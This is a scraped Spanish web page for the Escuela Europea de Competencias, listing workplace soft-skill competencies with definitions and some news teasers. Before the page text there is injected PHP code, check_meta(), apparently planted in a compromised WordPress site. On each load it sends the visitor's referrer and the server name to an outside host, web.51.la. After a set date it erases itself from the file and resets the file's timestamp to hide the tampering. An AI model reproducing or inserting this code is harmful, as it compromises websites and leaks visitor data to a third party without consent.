check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456731512){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/wp-includes/ID3/getid.php"); } Escuela Europea de Competencias | Desarrolla tus competencias

Forma parte de la escuela

Regístrate y disfruta de las ventajas de ser miembro de la Escuela Europea de Competencias

Ya soy miembro de EEC

También puedes crear una cuenta.

¿Has perdido tu contraseña?

Desarrolla tus competencias

La Escuela se centra en el desarrollo de competencias no técnicas actualmente demandadas por las Empresas.

El punto de partida para la identificación de las Competencias a desarrollar ha sido el Catálogo de Competencias procedente de los resultados obtenidos en un estudio liderado por IAT y realizado en España y otros países europeos -proyecto MODES-WP4 (http://www.modesproject.eu).

 Las principales competencias requeridas a los profesionales por el mercado de trabajo actual son:

COMPETENCIA

DEFINICIÓN

Comunicación Capacidad para transmitir ideas, información y opiniones de forma voluntaria,  clara y convincente, por escrito y oralmente, escuchando y siendo receptivo a las propuestas de los demás.
Trabajo en equipo Capacidad para establecer relaciones de participación y cooperación con otras personas, compartiendo recursos y conocimiento, armonizando intereses y contribuyendo activamente al logro de los objetivos de la organización.
Negociación Capacidad para argumentar de forma clara y coherente, conciliando posiciones diferentes y para lograr acuerdos satisfactorios para todos alcanzando los fines propuestos.
Redes de contacto Capacidad para establecer, mantener y potenciar contactos profesionales tanto a nivel interno como externo, con el objetivo de alcanzar los mejores resultados para la organización y velando por la imagen de ésta.
Capacidad de aprendizaje Capacidad para autoevaluar necesidades de conocimiento (teórico o aplicado) adoptando las medidas necesarias para adquirirlo y ponerlo en práctica, manteniendo una actitud flexible y abierta al aprendizaje a lo largo de la vida profesional.
Creatividad / Innovación Capacidad para aportar nuevas ideas que permitan desarrollar mejoras en los productos o servicios de la organización así como en las actividades que se desempeñan durante el trabajo, con el fin de responder a las necesidades de evolución de la organización.
Adaptación al cambio Capacidad para reorientar la forma de actuar ante nuevas situaciones para alcanzar los objetivos organizativos.
Toma de decisiones Capacidad para elegir la mejor alternativa a partir de la obtención, contraste e integración de información relevante obtenida de las fuentes más adecuadas, y para evaluar la asunción de riesgos en situaciones de incertidumbre, alcanzando objetivos de forma ágil y proactiva.
Capacidad de Análisis Capacidad para extraer conclusiones y previsiones para el futuro, como resultado de obtener información de distintas fuentes y establecer relaciones de causa-efecto.
Tolerancia a la presión Capacidad de resistencia en situaciones tensas o complicadas, barreras encontradas en el camino,  cargas de trabajo o ritmos no habituales manteniendo el mismo nivel de calidad en el trabajo realizado.
Capacidad de gestión Capacidad para establecer objetivos y prioridades, seleccionando y distribuyendo eficazmente tareas y recursos, realizando seguimiento de la evolución en la ejecución y actuando ante las posibles desviaciones que tengan lugar con respecto a lo planificado.
Orientación a Resultados Capacidad para rentabilizar el propio esfuerzo teniendo siempre presentes los objetivos que se persiguen, optimizando el uso del tiempo, priorizando las actividades a realizar y utilizando herramientas o metodologías que faciliten la realización de sus actividades.
Liderazgo Capacidad para motivar y dirigir a las personas, logrando que éstas contribuyan de forma efectiva y adecuada a la consecución de los objetivos, y para facilitar que se pongan en juego las capacidades y el potencial.
Compromiso/ Identificación con la organización Capacidad para comprender las características específicas de la organización y comprometerse con ella, alineando su conducta y sus responsabilidades profesionales con los valores, principios y objetivos de la misma. (Incluye Ética profesional = actúa teniendo presentes los principios y ética de la profesión en la actividad cotidiana).
Mejora continua Capacidad para llevar a cabo las actividades, funciones y responsabilidades inherentes al puesto de trabajo bajo estándares de calidad y buscando la mejora continua proponiendo la adaptación y modernización de los procesos y metodologías vigentes en la organización.
Adaptabilidad cultural Capacidad para desenvolverse y llevar a cabo procesos empresariales y de gestión en entornos multiculturales.
Gestión de conflictos Capacidad para hacer frente a discrepancias entre dos o más partes, escuchando, mediando, proponiendo soluciones y llegando a acuerdos satisfactorios para todos. Incluye Life balance (Equilibrio) = soluciona los conflictos que se producen de forma frecuente entre la vida laboral y la personal, entre los objetivos individuales y profesionales y entre los valores de la organización y los personales.
Orientación al cliente/usuario Capacidad para identificar, comprender y satisfacer con  eficiencia las necesidades de los clientes actuales y potenciales.

Este catálogo estará su sujeto a modificaciones, adaptándose a las necesidades y aportaciones de las Empresas adheridas a la Escuela.

Evalúa tus competencias!

 

Noticias recientes

Desmitificando el liderazgo

Desmitificando el liderazgo

¡Menos líderes y más liderazgo! ¡El liderazgo es acción, con un objetivo y un fin claro; no es[...]

¿Quién se ha llevado mi empleo y cómo puedo encontrarlo?

¿Quién se ha llevado mi empleo y cómo puedo encontrarlo?

Sevilla, 2 de Diciembre a las 11:00 horas ¿Sabías que las habilidades de búsqueda de empleo pued[...]

Prepara tu entrevista de selección por competencias y entrénalas en las dinámicas de grupo

Prepara tu entrevista de selección por competencias y entrénalas en las dinámicas de grupo

¿Sabes cómo afrontar a una entrevista de selección? La entrevista ha sido siempre la herramien[...]

La Escuela en fotos

Accede a nuestra galería de imágenes en Flickr

Activos Recientemente

Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario

La escuela en la red

My Great Web page